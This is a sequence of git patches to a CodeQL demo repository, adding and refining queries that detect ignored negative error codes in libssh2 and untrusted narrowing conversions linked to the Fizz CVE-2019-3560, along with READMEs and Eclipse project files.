.../04_eating_error_codes_localflow_rangeanalysis.ql | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql b/ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql index dd728ca..12da221 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql @@ -6,4 +6,4 @@ import cpp from ReturnStmt ret where ret.getExpr().getValue().toInt() < 0 -select ret \ No newline at end of file +select ret diff --git a/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql b/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql index 1a456ef..4e5bc7d 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql @@ -8,4 +8,4 @@ from Function f, FunctionCall call, ReturnStmt ret where call.getTarget() = f and ret.getEnclosingFunction() = f and ret.getExpr().getValue().toInt() < 0 -select call, ret \ No newline at end of file +select call, ret diff --git a/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql b/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql index bb92c7f..90d7329 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql @@ -9,4 +9,4 @@ where call.getTarget() = f and ret.getEnclosingFunction() = f and ret.getExpr().getValue().toInt() < 0 and call.getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() -select call, ret \ No newline at end of file +select call, ret diff --git a/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql b/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql index 25a7c67..b35ea56 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql @@ -15,4 +15,4 @@ and ret.getExpr().getValue().toInt() < 0 and source.asExpr() = call and DataFlow::localFlow(source, sink) and sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() -select source, sink \ No newline at end of file +select source, sink diff --git a/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql b/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql index 81f227a..f2f7b17 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql @@ -18,4 +18,4 @@ and source.asExpr() = call and DataFlow::localFlow(source, sink) and sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() and lowerBound(sink.asExpr()) < 0 -select sink \ No newline at end of file +select source, sink From 4761b320ae636e1bb8240fa9d82a2d6e69a7e8c2 Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Tue, 23 Jul 2019 10:07:49 +0100 Subject: [PATCH 22/36] Swap columns. --- ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql b/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql index 4e5bc7d..d1ccefd 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql @@ -8,4 +8,4 @@ from Function f, FunctionCall call, ReturnStmt ret where call.getTarget() = f and ret.getEnclosingFunction() = f and ret.getExpr().getValue().toInt() < 0 -select call, ret +select ret, call From 0fd55293ff115df88207eb560d7ce0d11711932e Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Tue, 6 Aug 2019 18:04:02 -0700 Subject: [PATCH 23/36] Add url for snapshot --- ql_demos/cpp/libssh2_eating_error_codes/README.md | 1 + 1 file changed, 1 insertion(+) create mode 100644 ql_demos/cpp/libssh2_eating_error_codes/README.md diff --git a/ql_demos/cpp/libssh2_eating_error_codes/README.md b/ql_demos/cpp/libssh2_eating_error_codes/README.md new file mode 100644 index 0000000..15f9926 --- /dev/null +++ b/ql_demos/cpp/libssh2_eating_error_codes/README.md @@ -0,0 +1 @@ +[Snapshot](https://downloads.lgtm.com/snapshots/cpp/libssh2/libssh2_libssh2_C_C++_38bf7ce.zip) From 4e033b7c42af4bc4711cb4d52d7b7132d170a8d5 Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Tue, 6 Aug 2019 18:14:03 -0700 Subject: [PATCH 24/36] Facebook Fizz demo --- .../FizzOverflow.ql | 49 +++++++++++++++++++ .../cpp/Facebook_Fizz_CVE-2019-3560/README.md | 1 + 2 files changed, 50 insertions(+) create mode 100644 ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql create mode 100644 ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/README.md diff --git a/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql b/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql new file mode 100644 index 0000000..f05154b --- /dev/null +++ b/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/FizzOverflow.ql @@ -0,0 +1,49 @@ +/** + * @name Fizz Overflow + * @description Narrowing conversions on untrusted data could enable + * an attacker to trigger an integer overflow. + * @kind path-problem + * @problem.severity warning + */ + +import cpp +import semmle.code.cpp.ir.dataflow.TaintTracking +import semmle.code.cpp.ir.IR +import DataFlow::PathGraph + +/** + * The endianness conversion function `Endian::big()`. + * It is Folly's replacement for `ntohs` and `ntohl`. + */ +class EndianConvert extends Function { + EndianConvert() { + this.getName() = "big" and + this.getDeclaringType().getName().matches("Endian") + } +} + +class Cfg extends TaintTracking::Configuration { + Cfg() { this = "FizzOverflowIR" } + + /** Holds if `source` is a call to `Endian::big()`. */ + override predicate isSource(DataFlow::Node source) { + source.(CallInstruction).getCallTarget().(FunctionInstruction).getFunctionSymbol() instanceof + EndianConvert + } + + /** Hold if `sink` is a narrowing conversion. */ + override predicate isSink(DataFlow::Node sink) { + sink.getResultSize() < sink.(ConvertInstruction).getUnary().getResultSize() + } +} + +from + Cfg cfg, DataFlow::PathNode source, DataFlow::PathNode sink, ConvertInstruction conv, + Type inputType, Type outputType +where + cfg.hasFlowPath(source, sink) and + conv = sink.getNode() and + inputType = conv.getUnary().getResultType() and + outputType = conv.getResultType() +select sink, source, sink, + "Conversion of untrusted data from " + inputType + " to " + outputType + "." diff --git a/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/README.md b/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/README.md new file mode 100644 index 0000000..9e5121e --- /dev/null +++ b/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/README.md @@ -0,0 +1 @@ +[Snapshot](https://downloads.lgtm.com/snapshots/cpp/facebook/fizz/facebookincubator_fizz_cpp-srcVersion_c69ad1baf3f04620393ebadc3eedd130b74f4023-dist_odasa-lgtm-2019-01-13-f9dca2a-universal.zip) From 5a3c9ca91aa68e002bc0cfb8ed58bcd1191c4a9b Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Tue, 6 Aug 2019 19:11:14 -0700 Subject: [PATCH 25/36] Add more details. --- ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/README.md b/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/README.md index 9e5121e..f930223 100644 --- a/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/README.md +++ b/ql_demos/cpp/Facebook_Fizz_CVE-2019-3560/README.md @@ -1 +1,5 @@ -[Snapshot](https://downloads.lgtm.com/snapshots/cpp/facebook/fizz/facebookincubator_fizz_cpp-srcVersion_c69ad1baf3f04620393ebadc3eedd130b74f4023-dist_odasa-lgtm-2019-01-13-f9dca2a-universal.zip) +# Facebook Fizz integer overflow vulnerability (CVE-2019-3560) + +Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/facebook/fizz/facebookincubator_fizz_cpp-srcVersion_c69ad1baf3f04620393ebadc3eedd130b74f4023-dist_odasa-lgtm-2019-01-13-f9dca2a-universal.zip) for the demo. + +[Fizz](https://github.com/facebookincubator/fizz) contained a remotely triggerable infinite loop. For more details about the bug, see this [blog post](https://lgtm.com/blog/facebook_fizz_CVE-2019-3560). A proof-of-concept exploit is available [here](https://github.com/Semmle/SecurityExploits/tree/446048470633bf0f8da9570d008d056dbaa28ea9/Facebook/Fizz/CVE-2019-3560). From e9c369cc8cf8ac99e37023e8fbb72c0f1c9aba67 Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Tue, 6 Aug 2019 20:03:55 -0700 Subject: [PATCH 26/36] Update comments. --- .../00_error_codes.ql | 6 ++++ .../01_error_codes_call.ql | 9 ++++-- .../02_eating_error_codes.ql | 11 ++++--- .../03_eating_error_codes_localflow.ql | 12 +++++-- ...ing_error_codes_localflow_rangeanalysis.ql | 31 ++++++++++++------- .../cpp/libssh2_eating_error_codes/README.md | 10 +++++- 6 files changed, 57 insertions(+), 22 deletions(-) diff --git a/ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql b/ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql index 12da221..22b3a3c 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/00_error_codes.ql @@ -4,6 +4,12 @@ import cpp +// Look for return statements that return a negative integer constant. +// For example: +// +// return -1; +// +// The negative return value might be an error code. from ReturnStmt ret where ret.getExpr().getValue().toInt() < 0 select ret diff --git a/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql b/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql index d1ccefd..01a631c 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql @@ -4,8 +4,11 @@ import cpp +// Extend the previous query to also find calls to functions that sometimes +// return a negative integer constant. from Function f, FunctionCall call, ReturnStmt ret -where call.getTarget() = f -and ret.getEnclosingFunction() = f -and ret.getExpr().getValue().toInt() < 0 +where + call.getTarget() = f and + ret.getEnclosingFunction() = f and + ret.getExpr().getValue().toInt() < 0 select ret, call diff --git a/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql b/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql index 90d7329..e7e8130 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql @@ -4,9 +4,12 @@ import cpp +// Look for calls that are cast to unsigned, which means that the error +// code might be accidentally ignored. from Function f, FunctionCall call, ReturnStmt ret -where call.getTarget() = f -and ret.getEnclosingFunction() = f -and ret.getExpr().getValue().toInt() < 0 -and call.getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() +where + call.getTarget() = f and + ret.getEnclosingFunction() = f and + ret.getExpr().getValue().toInt() < 0 and + call.getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() select call, ret diff --git a/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql b/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql index b35ea56..26f766f 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql @@ -5,9 +5,15 @@ import cpp import semmle.code.cpp.dataflow.DataFlow -// int r = f(); -// unsigned int x = r; - +// The previous query only handled cases where the result of the function +// call is immediately cast to unsigned. So it will fail to detect examples +// like this, where the cast doesn't happen immediately: +// +// int r = f(); +// unsigned int x = r; +// +// In this query, we add local dataflow so that we can also handle such +// cases. from Function f, FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink where call.getTarget() = f and ret.getEnclosingFunction() = f diff --git a/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql b/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql index f2f7b17..067306a 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql @@ -6,16 +6,25 @@ import cpp import semmle.code.cpp.dataflow.DataFlow import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis -// int r = f(); -// if (r < 0) return -1; -// unsigned int x = r; - +// The previous query produced some weird results. The problem is that it +// treats any expression with an unsigned type as a potential sink. What we +// really want is to find where the cast from signed to unsigned happens, +// because that's where the integer overflow occurs. So we want the sink to +// be a potentially negative expression that gets cast to unsigned. +// +// Note that by using range analysis, we can avoid producing false positive +// results for examples like this: +// +// int r = f(); +// if (r < 0) return -1; +// unsigned int x = r; from Function f, FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink -where call.getTarget() = f -and ret.getEnclosingFunction() = f -and ret.getExpr().getValue().toInt() < 0 -and source.asExpr() = call -and DataFlow::localFlow(source, sink) -and sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() -and lowerBound(sink.asExpr()) < 0 +where + call.getTarget() = f and + ret.getEnclosingFunction() = f and + ret.getExpr().getValue().toInt() < 0 and + source.asExpr() = call and + DataFlow::localFlow(source, sink) and + sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() and + lowerBound(sink.asExpr()) < 0 select source, sink diff --git a/ql_demos/cpp/libssh2_eating_error_codes/README.md b/ql_demos/cpp/libssh2_eating_error_codes/README.md index 15f9926..ea053a8 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/README.md +++ b/ql_demos/cpp/libssh2_eating_error_codes/README.md @@ -1 +1,9 @@ -[Snapshot](https://downloads.lgtm.com/snapshots/cpp/libssh2/libssh2_libssh2_C_C++_38bf7ce.zip) +# Eating error codes in libssh2 + +Use this [Snapshot](https://downloads.lgtm.com/snapshots/cpp/libssh2/libssh2_libssh2_C_C++_38bf7ce.zip) for the demo. + +This demo shows how to develop, step-by-step, the query from the [blog post](https://blog.semmle.com/libssh2-integer-overflow/) about libssh2 CVE-2019-13115. This query did not find the bug that caused the CVE. It is instead about doing variant analysis on a bug which we noticed on the development branch of libssh2. We sent the query results to the libssh2 development team and they were able to fix all the variants before the next version of libssh2 was released. + +[This](https://lgtm.com/projects/g/libssh2/libssh2/snapshot/6e2f5563c80521b3cde72a6fcdb675c2e085f9cf/files/src/hostkey.c?sort=name&dir=ASC&mode=heatmap&__hstc=70225743.5fa8704c8874c6eafaef219923a26734.1534954774206.1564532078978.1564925733575.72&__hssc=70225743.2.1565139962633&__hsfp=997709570#L677) is an example of the bug. The problem is that `_libssh2_get_c_string` returns an negative integer as an error code, but the type of `r_len` is `unsigned int`, so the error code is accidentally ignored. + +For a shorter demo, stop at step 02. Steps 03 and 04 make the query more sophisticated by adding local dataflow and range analysis. From e59f6fa0adfbf9df122e6aef0f855335e7071347 Mon Sep 17 00:00:00 2001 From: Kevin Backhouse Date: Mon, 2 Sep 2019 12:02:45 +0100 Subject: [PATCH 27/36] Apply suggestions from code review Co-Authored-By: jf205 <42464962+jf205@users.noreply.github.com> --- ql_demos/cpp/libssh2_eating_error_codes/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/ql_demos/cpp/libssh2_eating_error_codes/README.md b/ql_demos/cpp/libssh2_eating_error_codes/README.md index ea053a8..2c2a630 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/README.md +++ b/ql_demos/cpp/libssh2_eating_error_codes/README.md @@ -1,9 +1,9 @@ # Eating error codes in libssh2 -Use this [Snapshot](https://downloads.lgtm.com/snapshots/cpp/libssh2/libssh2_libssh2_C_C++_38bf7ce.zip) for the demo. +Download this [snapshot](https://downloads.lgtm.com/snapshots/cpp/libssh2/libssh2_libssh2_C_C++_38bf7ce.zip) for the demo. -This demo shows how to develop, step-by-step, the query from the [blog post](https://blog.semmle.com/libssh2-integer-overflow/) about libssh2 CVE-2019-13115. This query did not find the bug that caused the CVE. It is instead about doing variant analysis on a bug which we noticed on the development branch of libssh2. We sent the query results to the libssh2 development team and they were able to fix all the variants before the next version of libssh2 was released. +This demo shows how to develop, step-by-step, the query from the [blog post](https://blog.semmle.com/libssh2-integer-overflow/) about libssh2 CVE-2019-13115. This query did not find the bug that caused the CVE. It is instead about doing variant analysis on a bug that we noticed on the development branch of libssh2. We sent the query results to the libssh2 development team and they were able to fix all the variants before the next version of libssh2 was released. -[This](https://lgtm.com/projects/g/libssh2/libssh2/snapshot/6e2f5563c80521b3cde72a6fcdb675c2e085f9cf/files/src/hostkey.c?sort=name&dir=ASC&mode=heatmap&__hstc=70225743.5fa8704c8874c6eafaef219923a26734.1534954774206.1564532078978.1564925733575.72&__hssc=70225743.2.1565139962633&__hsfp=997709570#L677) is an example of the bug. The problem is that `_libssh2_get_c_string` returns an negative integer as an error code, but the type of `r_len` is `unsigned int`, so the error code is accidentally ignored. +[This](https://lgtm.com/projects/g/libssh2/libssh2/snapshot/6e2f5563c80521b3cde72a6fcdb675c2e085f9cf/files/src/hostkey.c?sort=name&dir=ASC&mode=heatmap&__hstc=70225743.5fa8704c8874c6eafaef219923a26734.1534954774206.1564532078978.1564925733575.72&__hssc=70225743.2.1565139962633&__hsfp=997709570#L677) is an example of the bug. The problem is that `_libssh2_get_c_string` returns a negative integer as an error code, but the type of `r_len` is `unsigned int`, so the error code is accidentally ignored. -For a shorter demo, stop at step 02. Steps 03 and 04 make the query more sophisticated by adding local dataflow and range analysis. +For a shorter demo, stop at step 02. Steps 03 and 04 make the query more sophisticated by adding local data flow and range analysis. From 6682947983a6331bc577e66e7b1f913cccec33a4 Mon Sep 17 00:00:00 2001 From: Ana Armas Romero Date: Thu, 12 Sep 2019 12:05:14 +0100 Subject: [PATCH 28/36] reorder query lines in libssh2_eating_error_codes --- .../01_error_codes_call.ql | 4 ++-- .../02_eating_error_codes.ql | 4 ++-- .../03_eating_error_codes_localflow.ql | 13 +++++++------ ...04_eating_error_codes_localflow_rangeanalysis.ql | 4 ++-- 4 files changed, 13 insertions(+), 12 deletions(-) diff --git a/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql b/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql index 01a631c..05864bb 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql @@ -8,7 +8,7 @@ import cpp // return a negative integer constant. from Function f, FunctionCall call, ReturnStmt ret where - call.getTarget() = f and + ret.getExpr().getValue().toInt() < 0 and ret.getEnclosingFunction() = f and - ret.getExpr().getValue().toInt() < 0 + call.getTarget() = f select ret, call diff --git a/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql b/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql index e7e8130..408200d 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql @@ -8,8 +8,8 @@ import cpp // code might be accidentally ignored. from Function f, FunctionCall call, ReturnStmt ret where - call.getTarget() = f and - ret.getEnclosingFunction() = f and ret.getExpr().getValue().toInt() < 0 and + ret.getEnclosingFunction() = f and + call.getTarget() = f and call.getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() select call, ret diff --git a/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql b/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql index 26f766f..08fb58f 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql @@ -15,10 +15,11 @@ import semmle.code.cpp.dataflow.DataFlow // In this query, we add local dataflow so that we can also handle such // cases. from Function f, FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink -where call.getTarget() = f -and ret.getEnclosingFunction() = f -and ret.getExpr().getValue().toInt() < 0 -and source.asExpr() = call -and DataFlow::localFlow(source, sink) -and sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() +where + ret.getExpr().getValue().toInt() < 0 and + ret.getEnclosingFunction() = f and + call.getTarget() = f and + source.asExpr() = call and + DataFlow::localFlow(source, sink) and + sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() select source, sink diff --git a/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql b/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql index 067306a..af32f32 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql @@ -20,9 +20,9 @@ import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis // unsigned int x = r; from Function f, FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink where - call.getTarget() = f and - ret.getEnclosingFunction() = f and ret.getExpr().getValue().toInt() < 0 and + ret.getEnclosingFunction() = f and + call.getTarget() = f and source.asExpr() = call and DataFlow::localFlow(source, sink) and sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() and From 840a0fa23f5e30a27ca347b6823f9e6694eef529 Mon Sep 17 00:00:00 2001 From: Ana Armas Romero Date: Thu, 12 Sep 2019 16:18:29 +0100 Subject: [PATCH 29/36] Omit Function f in query development for libssh2 eating error codes --- .../cpp/libssh2_eating_error_codes/01_error_codes_call.ql | 5 ++--- .../cpp/libssh2_eating_error_codes/02_eating_error_codes.ql | 5 ++--- .../03_eating_error_codes_localflow.ql | 5 ++--- .../04_eating_error_codes_localflow_rangeanalysis.ql | 5 ++--- 4 files changed, 8 insertions(+), 12 deletions(-) diff --git a/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql b/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql index 05864bb..b5756c4 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/01_error_codes_call.ql @@ -6,9 +6,8 @@ import cpp // Extend the previous query to also find calls to functions that sometimes // return a negative integer constant. -from Function f, FunctionCall call, ReturnStmt ret +from FunctionCall call, ReturnStmt ret where ret.getExpr().getValue().toInt() < 0 and - ret.getEnclosingFunction() = f and - call.getTarget() = f + call.getTarget() = ret.getEnclosingFunction() select ret, call diff --git a/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql b/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql index 408200d..2df3bc3 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/02_eating_error_codes.ql @@ -6,10 +6,9 @@ import cpp // Look for calls that are cast to unsigned, which means that the error // code might be accidentally ignored. -from Function f, FunctionCall call, ReturnStmt ret +from FunctionCall call, ReturnStmt ret where ret.getExpr().getValue().toInt() < 0 and - ret.getEnclosingFunction() = f and - call.getTarget() = f and + call.getTarget() = ret.getEnclosingFunction() and call.getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() select call, ret diff --git a/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql b/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql index 08fb58f..5cf6201 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/03_eating_error_codes_localflow.ql @@ -14,11 +14,10 @@ import semmle.code.cpp.dataflow.DataFlow // // In this query, we add local dataflow so that we can also handle such // cases. -from Function f, FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink +from FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink where ret.getExpr().getValue().toInt() < 0 and - ret.getEnclosingFunction() = f and - call.getTarget() = f and + call.getTarget() = ret.getEnclosingFunction() and source.asExpr() = call and DataFlow::localFlow(source, sink) and sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() diff --git a/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql b/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql index af32f32..43877d3 100644 --- a/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql +++ b/ql_demos/cpp/libssh2_eating_error_codes/04_eating_error_codes_localflow_rangeanalysis.ql @@ -18,11 +18,10 @@ import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis // int r = f(); // if (r < 0) return -1; // unsigned int x = r; -from Function f, FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink +from FunctionCall call, ReturnStmt ret, DataFlow::Node source, DataFlow::Node sink where ret.getExpr().getValue().toInt() < 0 and - ret.getEnclosingFunction() = f and - call.getTarget() = f and + call.getTarget() = ret.getEnclosingFunction() and source.asExpr() = call and DataFlow::localFlow(source, sink) and sink.asExpr().getFullyConverted().getType().getUnderlyingType().(IntegralType).isUnsigned() and From 168ca541b6b2b8a027944e29f777b6c2b1d96932 Mon Sep 17 00:00:00 2001 From: Ana Armas Romero Date: Thu, 12 Sep 2019 16:54:08 +0100 Subject: [PATCH 30/36] Commit .project and .qlpath files in language-specific subprojects of ql_demos to make importing into a fresh Eclipse workspace easier. With these changes, projects can now be imported using the `Import > Existing Projects into Workspace` pathway and they automatically have the right nature and language. --- .gitignore | 1 + ql_demos/.project | 11 ----------- ql_demos/cpp/.project | 12 ++++++++++++ ql_demos/cpp/.qlpath | 10 ++++++++++ ql_demos/csharp/.project | 12 ++++++++++++ ql_demos/csharp/.qlpath | 10 ++++++++++ ql_demos/java/.project | 12 ++++++++++++ ql_demos/javascript/.project | 12 ++++++++++++ ql_demos/javascript/.qlpath | 10 ++++++++++ 9 files changed, 79 insertions(+), 11 deletions(-) delete mode 100644 ql_demos/.project create mode 100644 ql_demos/cpp/.project create mode 100644 ql_demos/cpp/.qlpath create mode 100644 ql_demos/csharp/.project create mode 100644 ql_demos/csharp/.qlpath create mode 100644 ql_demos/java/.project create mode 100644 ql_demos/javascript/.project create mode 100644 ql_demos/javascript/.qlpath diff --git a/.gitignore b/.gitignore index 80e3807..fb8438c 100644 --- a/.gitignore +++ b/.gitignore @@ -1,2 +1,3 @@ # emacs backups *~ +/.metadata/ diff --git a/ql_demos/.project b/ql_demos/.project deleted file mode 100644 index 334c851..0000000 --- a/ql_demos/.project +++ /dev/null @@ -1,11 +0,0 @@ - - - QL Demos - - - - - - - - diff --git a/ql_demos/cpp/.project b/ql_demos/cpp/.project new file mode 100644 index 0000000..5f9d7d6 --- /dev/null +++ b/ql_demos/cpp/.project @@ -0,0 +1,12 @@ + + + cpp + + + + + + + com.semmle.plugin.qdt.core.qlnature + + diff --git a/ql_demos/cpp/.qlpath b/ql_demos/cpp/.qlpath new file mode 100644 index 0000000..61ec3c4 --- /dev/null +++ b/ql_demos/cpp/.qlpath @@ -0,0 +1,10 @@ + + + + com.semmle.code.cpp.library + + com.semmle.code.cpp.dbscheme + + cpp + + diff --git a/ql_demos/csharp/.project b/ql_demos/csharp/.project new file mode 100644 index 0000000..ec33cbc --- /dev/null +++ b/ql_demos/csharp/.project @@ -0,0 +1,12 @@ + + + csharp + + + + + + + com.semmle.plugin.qdt.core.qlnature + + diff --git a/ql_demos/csharp/.qlpath b/ql_demos/csharp/.qlpath new file mode 100644 index 0000000..ded3be5 --- /dev/null +++ b/ql_demos/csharp/.qlpath @@ -0,0 +1,10 @@ + + + + com.semmle.code.csharp.library + + com.semmle.code.csharp.dbscheme + + csharp + + diff --git a/ql_demos/java/.project b/ql_demos/java/.project new file mode 100644 index 0000000..6508e1b --- /dev/null +++ b/ql_demos/java/.project @@ -0,0 +1,12 @@ + + + java + + + + + + + com.semmle.plugin.qdt.core.qlnature + + diff --git a/ql_demos/javascript/.project b/ql_demos/javascript/.project new file mode 100644 index 0000000..bc5b8b6 --- /dev/null +++ b/ql_demos/javascript/.project @@ -0,0 +1,12 @@ + + + javascript + + + + + + + com.semmle.plugin.qdt.core.qlnature + + diff --git a/ql_demos/javascript/.qlpath b/ql_demos/javascript/.qlpath new file mode 100644 index 0000000..d705efa --- /dev/null +++ b/ql_demos/javascript/.qlpath @@ -0,0 +1,10 @@ + + + + com.semmle.code.javascript.library + + com.semmle.code.javascript.dbscheme + + javascript + + From 235aad0749da0a1e1c554e795ff3d3dee9c08c58 Mon Sep 17 00:00:00 2001 From: ana Date: Mon, 16 Sep 2019 09:55:51 +0100 Subject: [PATCH 31/36] rename Eclipse projects --- ql_demos/cpp/.project | 2 +- ql_demos/csharp/.project | 2 +- ql_demos/java/.project | 2 +- 